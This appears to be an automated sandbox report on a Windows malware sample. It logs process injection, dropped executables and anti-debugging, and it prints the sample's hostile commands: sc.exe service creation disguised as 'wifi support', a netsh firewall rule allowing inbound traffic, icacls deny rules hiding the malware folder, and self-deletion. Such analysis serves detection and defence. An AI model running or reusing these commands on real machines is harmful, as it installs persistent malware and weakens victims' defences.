1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exeCF8F.exeD48F.exeE812.exedescription pid process target process PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 612 wrote to memory of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 1264 wrote to memory of 812 1264 CF8F.exe PID 1264 wrote to memory of 812 1264 CF8F.exe PID 1264 wrote to memory of 812 1264 CF8F.exe PID 1264 wrote to memory of 812 1264 CF8F.exe PID 1264 wrote to memory of 1164 1264 D48F.exe PID 1264 wrote to memory of 1164 1264 D48F.exe PID 1264 wrote to memory of 1164 1264 D48F.exe PID 1264 wrote to memory of 1164 1264 D48F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 812 wrote to memory of 1056 812 CF8F.exe CF8F.exe PID 1264 wrote to memory of 1344 1264 DE12.exe PID 1264 wrote to memory of 1344 1264 DE12.exe PID 1264 wrote to memory of 1344 1264 DE12.exe PID 1264 wrote to memory of 1344 1264 DE12.exe PID 1164 wrote to memory of 824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 824 1164 D48F.exe cmd.exe PID 1264 wrote to memory of 1628 1264 E18C.exe PID 1264 wrote to memory of 1628 1264 E18C.exe PID 1264 wrote to memory of 1628 1264 E18C.exe PID 1264 wrote to memory of 1628 1264 E18C.exe PID 1164 wrote to memory of 1824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 1824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 1824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 1824 1164 D48F.exe cmd.exe PID 1164 wrote to memory of 1744 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1744 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1744 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1744 1164 D48F.exe sc.exe PID 1264 wrote to memory of 1968 1264 E812.exe PID 1264 wrote to memory of 1968 1264 E812.exe PID 1264 wrote to memory of 1968 1264 E812.exe PID 1264 wrote to memory of 1968 1264 E812.exe PID 1164 wrote to memory of 1208 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1208 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1208 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1208 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1536 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1536 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1536 1164 D48F.exe sc.exe PID 1164 wrote to memory of 1536 1164 D48F.exe sc.exe PID 1164 wrote to memory of 2036 1164 D48F.exe netsh.exe PID 1164 wrote to memory of 2036 1164 D48F.exe netsh.exe PID 1164 wrote to memory of 2036 1164 D48F.exe netsh.exe PID 1164 wrote to memory of 2036 1164 D48F.exe netsh.exe PID 1968 wrote to memory of 720 1968 E812.exe E812.exe PID 1968 wrote to memory of 720 1968 E812.exe E812.exe PID 1968 wrote to memory of 720 1968 E812.exe E812.exe PID 1968 wrote to memory of 720 1968 E812.exe E812.exe PID 1968 wrote to memory of 720 1968 E812.exe E812.exe PID 1968 wrote to memory of 720 1968 E812.exe E812.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\CF8F.exeC:\Users\Admin\AppData\Local\Temp\CF8F.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CF8F.exeC:\Users\Admin\AppData\Local\Temp\CF8F.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\D48F.exeC:\Users\Admin\AppData\Local\Temp\D48F.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gipbfwre\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zfadmvvq.exe" C:\Windows\SysWOW64\gipbfwre\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create gipbfwre binPath= "C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d\"C:\Users\Admin\AppData\Local\Temp\D48F.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description gipbfwre "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start gipbfwre2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\AppData\Local\Temp\DE12.exeC:\Users\Admin\AppData\Local\Temp\DE12.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\E18C.exeC:\Users\Admin\AppData\Local\Temp\E18C.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\E812.exeC:\Users\Admin\AppData\Local\Temp\E812.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\E812.exeC:\Users\Admin\AppData\Local\Temp\E812.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exeC:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d"C:\Users\Admin\AppData\Local\Temp\D48F.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jfefuofz\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\gyqxwnyf.exe" C:\Windows\SysWOW64\jfefuofz\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create jfefuofz binPath= "C:\Windows\SysWOW64\jfefuofz\gyqxwnyf.exe /d\"C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description jfefuofz "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jfefuofz2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\F877.dll1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\FAC9.exeC:\Users\Admin\AppData\Local\Temp\FAC9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\101.exeC:\Users\Admin\AppData\Local\Temp\101.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\630.exeC:\Users\Admin\AppData\Local\Temp\630.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\ProgramData\cupd.exe"C:\ProgramData\cupd.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "Admin:(R,REA,RA,RD)"3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"4⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "Admin:(R,REA,RA,RD)"4⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\630.exe" & exit2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskeng.exetaskeng.exe {647FF540-8865-4C26-A0E7-9036F3F3C0BF} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
